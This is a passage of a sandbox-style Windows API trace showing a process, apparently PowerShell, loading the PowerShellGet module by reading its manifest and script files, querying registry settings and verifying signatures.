Data4=([0]=0x94, [1]=0x9e, [2]=0x17, [3]=0x28, [4]=0x65, [5]=0xf7, [6]=0xd4, [7]=0x7c))) returned 0x0 [0088.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c4 [0088.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4c8 
[0088.020] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4cc [0088.020] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d0 [0088.020] SetEvent (hEvent=0x4d0) returned 1 [0088.020] SetEvent (hEvent=0x4c4) returned 1 [0088.020] SetEvent (hEvent=0x4c8) returned 1 [0088.020] SetEvent (hEvent=0x4cc) returned 1 [0088.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d4 [0088.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0088.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.160] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe6cc, Length=0x20, ResultLength=0x4ebe73c | out: SystemInformation=0x4ebe6cc, ResultLength=0x4ebe73c*=0x0) returned 0xc0000003 [0088.161] GetSystemInfo (in: lpSystemInfo=0x4ebe748 | out: lpSystemInfo=0x4ebe748*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, 
lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0088.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe6d8 | out: phkResult=0x4ebe6d8*=0x468) returned 0x0 [0088.161] RegQueryValueExW (in: hKey=0x468, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe6f4, lpData=0x0, lpcbData=0x4ebe6f0*=0x0 | out: lpType=0x4ebe6f4*=0x0, lpData=0x0, lpcbData=0x4ebe6f0*=0x0) returned 0x2 [0088.161] RegCloseKey (hKey=0x468) returned 0x0 [0088.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe650) returned 1 [0088.168] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0088.169] GetFileType (hFile=0x468) returned 0x1 [0088.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe64c) returned 1 [0088.169] GetFileType (hFile=0x468) returned 0x1 [0088.169] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x0 [0088.169] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0x1000, lpOverlapped=0x0) returned 1 [0088.170] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x1000 [0088.170] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0xde, lpOverlapped=0x0) returned 1 [0088.170] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x10de [0088.170] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe6b8, lpOverlapped=0x0 | out: lpBuffer=0x6bbb418*, lpNumberOfBytesRead=0x4ebe6b8*=0x0, lpOverlapped=0x0) returned 1 [0088.170] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe620, Length=0x20, ResultLength=0x4ebe690 | out: SystemInformation=0x4ebe620, ResultLength=0x4ebe690*=0x0) returned 0xc0000003 [0088.171] GetSystemInfo (in: lpSystemInfo=0x4ebe69c | out: lpSystemInfo=0x4ebe69c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0088.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe62c | out: phkResult=0x4ebe62c*=0x4f0) returned 0x0 [0088.171] 
RegQueryValueExW (in: hKey=0x4f0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe648, lpData=0x0, lpcbData=0x4ebe644*=0x0 | out: lpType=0x4ebe648*=0x0, lpData=0x0, lpcbData=0x4ebe644*=0x0) returned 0x2 [0088.171] RegCloseKey (hKey=0x4f0) returned 0x0 [0088.171] CloseHandle (hObject=0x468) returned 1 [0088.173] CoCreateGuid (in: pguid=0x4ebe71c | out: pguid=0x4ebe71c*(Data1=0x571c508, Data2=0x9c52, Data3=0x4a23, Data4=([0]=0xaa, [1]=0x0, [2]=0xd3, [3]=0x7e, [4]=0xb, [5]=0x56, [6]=0x79, [7]=0x46))) returned 0x0 [0088.178] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe47c | out: lpPerformanceCount=0x4ebe47c*=1641099451797) returned 1 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe168) returned 1 [0088.178] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe42c | out: lpFileInformation=0x4ebe42c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.178] SetThreadErrorMode 
(dwNewMode=0x0, lpOldMode=0x4ebe164) returned 1 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe0fc) returned 1 [0088.180] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe3c0 | out: lpFileInformation=0x4ebe3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe0f8) returned 1 
[0088.180] CoTaskMemAlloc (cb=0x10) returned 0x425e718 [0088.180] CoTaskMemAlloc (cb=0x10) returned 0x425e670 [0088.180] CoTaskMemAlloc (cb=0xa8) returned 0x2d4c70 [0088.180] CoTaskMemAlloc (cb=0x30) returned 0x349cd0 [0088.180] WinVerifyTrust () returned 0x800b0100 [0088.191] CoTaskMemFree (pv=0x425e718) [0088.191] CoTaskMemFree (pv=0x349cd0) [0088.191] CryptCATHandleFromStore () returned 0x2bf9b8 [0088.191] WTHelperGetProvSignerFromChain () returned 0x0 [0088.191] CoTaskMemAlloc (cb=0x10) returned 0x425e718 [0088.191] CoTaskMemAlloc (cb=0x30) returned 0x349cd0 [0088.191] WinVerifyTrust () returned 0x0 [0088.191] CoTaskMemFree (pv=0x349cd0) [0088.191] CoTaskMemFree (pv=0x425e718) [0088.191] CoTaskMemFree (pv=0x2d4c70) [0088.191] CoTaskMemFree (pv=0x425e670) [0088.256] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en-US\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en-us\\powershellget.psd1")) returned 0xffffffff [0088.257] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en\\powershellget.psd1")) returned 0xffffffff [0088.266] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.270] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0088.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0088.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebddb8 | out: phkResult=0x4ebddb8*=0x468) returned 0x0 [0088.298] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x0, lpcbData=0x4ebddd4*=0x0 | out: lpType=0x4ebddd8*=0x1, lpData=0x0, lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.298] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x6be4f24, lpcbData=0x4ebddd4*=0x56 | out: lpType=0x4ebddd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.298] RegCloseKey (hKey=0x468) returned 0x0 [0088.302] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.307] GetFileAttributesW (lpFileName="C:\\Program 
Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebddb8 | out: phkResult=0x4ebddb8*=0x468) returned 0x0 [0088.308] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x0, lpcbData=0x4ebddd4*=0x0 | out: lpType=0x4ebddd8*=0x1, lpData=0x0, lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.308] RegQueryValueExW (in: hKey=0x468, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebddd8, lpData=0x6bf1e68, lpcbData=0x4ebddd4*=0x56 | out: lpType=0x4ebddd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebddd4*=0x56) returned 0x0 [0088.308] RegCloseKey (hKey=0x468) returned 0x0 [0088.313] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.317] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.327] 
GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0088.331] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0088.335] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Resource.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.resource.psd1")) returned 0x20 [0088.342] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0088.342] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", nBufferLength=0x55, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x54 [0088.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebdbb8) returned 1 [0088.342] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGetModuleInfo.xml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x4ebde7c | out: lpFileInformation=0x4ebde7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 
nFileSizeLow=0x0)) returned 0 [0088.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebdbb4) returned 1 [0088.344] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0088.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0088.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0088.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd6e0) returned 1 [0088.390] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6c1f280 | out: lpFileInformation=0x6c1f280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e634a0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0088.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd6dc) returned 1 [0088.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0088.390] GetFullPathNameW (in: lpFileName="C:\\Program 
Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0088.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd884) returned 1 [0088.390] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0088.391] GetFileType (hFile=0x468) returned 0x1 [0088.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd880) returned 1 [0088.391] GetFileType (hFile=0x468) returned 0x1 [0088.391] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x0 [0088.391] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.393] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1000 [0088.393] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.394] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.395] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.395] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4000 [0088.395] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.396] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5000 [0088.396] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.396] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6000 [0088.396] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7000 [0088.397] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, 
